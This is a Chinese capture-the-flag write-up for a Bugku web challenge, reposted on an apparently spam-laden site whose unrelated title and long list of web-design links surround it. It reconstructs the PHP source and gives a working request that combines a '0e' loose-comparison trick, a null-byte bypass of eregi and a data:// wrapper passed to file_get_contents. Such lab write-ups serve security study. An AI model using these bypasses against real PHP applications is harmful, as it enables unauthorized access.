当前位置: 首页 > wzjs >正文

温州网站设计只找亿企邦长沙有哪些网络科技公司

wzjs 2025/9/3 7:46:23
温州网站设计只找亿企邦,长沙有哪些网络科技公司,石家庄有哪些互联网公司,百度搜索引擎优化的方法一个很有意思的题: never_give_up - Bugku CTF平台 注意到注释里面有1p.html,我们直接在源代码界面看,这样就不会跳转到它那个链接的: 然后解码可得: ";if(!$_GET[id]) {header(Location: hello.php?id1);exi…

一个很有意思的题:
never_give_up - Bugku CTF平台

注意到注释里面有1p.html,我们直接在源代码界面看,这样就不会跳转到它那个链接的:

然后解码可得:

";if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{$flag = "flag{***********}"
}
else
{print "never never never give up !!!";
}?>

实际上就是这三个条件,

  1. id=0e123即可,php读入直接会是0
  2. b这里要求长度大于5,第一个不能是4,但是又要和1114匹配,这里直接用字符就可以绕过b=%0011111
  3. a这里要使用file_get_contents的漏洞,可以使用php://input和data://text/plain,但是我的bp版本高好像php://input没用了,所以这里用后者代替把字符串输进去

GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1

在burp加上这么一句即可:

http://www.dtcms.com/wzjs/591185.html

相关文章:

  • 广东做网站公司网站建设的pest分析
  • 网站建设费用自建有什么网站做交流会
  • 玉环市建设局网站网站建设怎样提升形象与品牌价值
  • 网站后台设置关键字品牌定位的三要素
  • 专业设计网站的公司县城乡建设局网站
  • 巴中微信网站建设太原北京网站建设
  • 手机建网站公司娄底网站建设设计
  • 5个在线设计网站wordpress 自动图片
  • 做网站推广价格中国形象设计网
  • 为什么要做企业网站h5与wordpress
  • 深圳微信商城网站设计价格生成ppt的软件
  • 北湖区网站建设专业wordpress前台注册登入
  • 制作网站策划书企业网站建立制作
  • 东莞网站建设基本流程图在线图片制作工具大全
  • 鄂伦春网站建设湖南省网站备案
  • 中国第八冶金建设公司网站网络推广策划方案模板
  • 建网站要什么数字营销技术应用
  • 计算机网站建设 是什么意思推广普通话的重要性
  • 网站开发文本做网站时背景图片浮动
  • wordpress 静态内容无锡做网站优化哪家好
  • 黑龙江做网站找谁辽宁省建筑工程造价信息网
  • 无锡网站营销公司网页游戏开发入门
  • 个人博客网站建设手机网站默认全屏
  • 网站建设商标保护网页制作的公司怎么注册
  • 商城式网站具备哪些功能吗常州个人网站建设
  • 做苗木行业网站赚钱公司网站后如何更新
  • asp.net 网站安全 检测网页版面布局设计步骤
  • 怎样找人做网站怎样做网站广告
  • 实用网站模板gzip wordpress
  • 外贸网站建设平台哪个好用wordpress建商城